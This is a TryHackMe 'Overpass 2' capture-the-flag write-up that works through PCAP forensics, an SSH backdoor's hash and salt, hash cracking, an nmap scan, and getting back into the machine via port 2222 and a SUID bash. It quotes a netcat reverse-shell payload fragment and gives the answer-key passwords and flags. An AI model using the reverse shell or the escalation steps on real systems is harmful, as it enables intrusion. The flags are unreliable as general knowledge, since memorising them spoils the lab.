# TryHackMe-Overpass 2
## Forensics-Analyse the PCAP
1. What was the URL of the page they used to upload a reverse shell?
`development`
2. What payload did the attacker use to gain access?
`&1|nc 192.168.170.145 4242 >/tmp/f")?>`
3. What password did the attacker use to privesc?
Follow the tcp stream from packet `4` and change the stream until you see something interesting
`whenevernoteartinstant`
4. How did the attacker establish persistence?
`https://github.com/NinjaJc01/ssh-backdoor`
5. Using the fasttrack wordlist, how many of the system passwords were crackable?
Store the hashes in a text file for cracking
`4`
## Research-Analyse the code
1. What's the default hash for the backdoor?
Visit the github for the ssh-backdoor
`bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3`
2. What's the hardcoded salt for the backdoor?
You can find the `salt` being passed to `verifypass` function
`1c362db832f3f864c8c2fe05f2002a05`
3. What was the hash that the attacker used? - go back to the PCAP for this!
`6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed`
4. Crack the hash using rockyou and a cracking tool of your choice. What's the password?
Since the hash is SHA512 we are going to use hashcat and for that we have to find the mode for that hash so we can specify it to crack
But doing this didn't help as this is salted so we know the default hash that this backdoor uses so add the default salt to the hash
```
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
```
`november16`
## Attack-Get back in!
### NMAP
```
nmap -sC -sV 10.10.196.150
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 21:06 PKT
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.75% done; ETC: 21:06 (0:00:00 remaining)
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.75% done; ETC: 21:06 (0:00:00 remaining)
Nmap scan report for 10.10.196.150
Host is up (0.16s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
| 256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_ 256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open ssh OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|_ 2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.99 seconds
```
1. The attacker defaced the website. What message did they leave as a heading?
`H4ck3d by CooctusClan`
2. What's the user flag?
Now there are two ports open for SSH
Port 22 didn't work but port 2222 did as we saw from the nmap scan it is another ssh port
`thm{d119b4fa8c497ddb0525f7ad200e6567}`
3. What's the root flag?
The binary `.suid_bash` has SUID permissions that can execute has the owner of that file so with `./.suid_bash -p` this -p will allow to run as the permissions of that users
`thm{d53b2684f169360bb9606c333873144d}`